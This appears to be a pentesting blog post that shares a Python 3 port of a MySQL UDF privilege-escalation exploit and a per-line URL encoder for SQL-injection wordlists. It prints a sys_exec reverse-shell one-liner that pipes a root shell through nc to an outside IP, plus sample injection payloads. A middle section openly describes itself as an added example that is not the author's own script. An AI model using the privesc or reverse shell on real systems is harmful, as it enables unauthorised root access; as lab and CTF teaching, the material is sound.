I haven’t had as much time as I would have liked to start on some other projects, but I have uploaded two new scripts to my GitHub (https://github.com/atthacks/).
This is a really useful script, but unfortunately I cannot take the credit for this one. I have simply changed a few lines to make it Python 3 compatible. The original author d7x (https://twitter.com/d7x_real/) did a great job of automating this MySQL privilege escalation (https://www.exploit-db.com/exploits/1518).
As you can see there are usually a number of manual steps to complete this privesc. However, if you find yourself in a position where you can use this exploit then simply running this script and passing the MySQL username and password will automate the process.
python3 udf_root_py3.py --username root --password rootPassword
You may or may not have success with the root shell it attempts to open for you. In my experience I had to exit the shell it dropped me into and return to the MySQL instance before using the following command to execute commands as root.
select sys_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 80 >/tmp/f');
What is this script?
This was a quick Python script I put together to URL encode / decode lists.
Why did I create it?
This can have a lot of uses, not just in pentesting / CTF exercises. The reason I made this in particular was because I was in a situation where I could not use a tool such as sqlmap to detect SQL injection, and instead of manually testing everything from my SQL injection cheatsheet I could automate it with a tool like wfuzz.
Where have I used it?
Using Burp Intruder, you can upload a list and there is a tickbox option to automatically URL encode specific characters under Intruder >> Payloads >> Payload Encoding.
Now if you have the Community version of Burp, using Intruder like this can take a long time especially if you have a large list. It is simple enough to recreate the request for wfuzz (or similar) and use the output of this tool as your input file for wfuzz.
Soon I will be making a post on how to use tools such as wfuzz in order to look for SQL Injection without using a fully automated tool such as sqlmap.
Other ways of doing this?
There are lots of ways / scripts to do this, and when you look online there are many encoders / decoders. However, what I found is that they all seem to encode the entire contents into a single line, which doesn’t help if you want to use the output as a one-payload-per-line wordlist in the way described above.
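To show the line-by-line behaviour the post is asking for, here is an added example of a per-line URL encoder / decoder written for this post; it is not the script from the GitHub repository, and the file name urlcode_lines.py, the sample payload list and the --safe option are my own assumptions. Each input line is treated as one payload and encoded or decoded on its own, so the output keeps one entry per line and can be used directly as a wordlist for wfuzz or Burp Intruder.

```python
#!/usr/bin/env python3
"""Per-line URL encoder / decoder for wordlists (added example, not the author's script).

Each input line is one payload and is encoded or decoded independently, so the
output preserves the one-entry-per-line structure a fuzzer expects. Blank
lines and CRLF endings are handled by str.splitlines().
"""
from __future__ import annotations

import argparse
import sys
from urllib.parse import quote, unquote


def encode_lines(text: str, safe: str = "") -> list[str]:
    """URL-encode every line of `text` separately, preserving line structure.

    `safe` lists characters that must NOT be percent-encoded. urllib's quote()
    always leaves the unreserved characters A-Z a-z 0-9 _ . - ~ untouched, so
    with safe="" everything else (space, quote, =, #, /, ...) becomes %XX.
    """
    return [quote(line, safe=safe) for line in text.splitlines()]


def decode_lines(text: str) -> list[str]:
    """URL-decode every line of `text` separately."""
    return [unquote(line) for line in text.splitlines()]


# Constructed sample wordlist (one payload per line); the third entry is the
# already-encoded form of the first, so a decode round-trips it.
SAMPLE = "' OR 1=1-- -\nadmin' #\n%27%20OR%201%3D1--%20-\n"


def main(argv: list[str] | None = None) -> int:
    parser = argparse.ArgumentParser(
        description="URL encode / decode a wordlist one line at a time")
    parser.add_argument("mode", choices=["encode", "decode"])
    parser.add_argument("infile", nargs="?", type=argparse.FileType("r"),
                        default=sys.stdin, help="input list (default: stdin)")
    parser.add_argument("-o", "--output", type=argparse.FileType("w"),
                        default=sys.stdout, help="output file (default: stdout)")
    parser.add_argument("--safe", default="",
                        help="characters to leave unencoded in encode mode, e.g. '/'")
    args = parser.parse_args(argv)

    text = args.infile.read()
    lines = encode_lines(text, args.safe) if args.mode == "encode" else decode_lines(text)
    # Write one payload per line; no trailing newline for an empty list.
    args.output.write("\n".join(lines) + ("\n" if lines else ""))
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Usage is `python3 urlcode_lines.py encode payloads.txt -o payloads_enc.txt` (file names are placeholders), or pipe a list through stdin with `decode`. The `--safe` option is the inverse of Burp's "URL-encode these characters" tickbox: instead of listing what to encode, you list what to leave alone, which is how urllib's quote() works.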
Anyway I hope someone finds these scripts useful.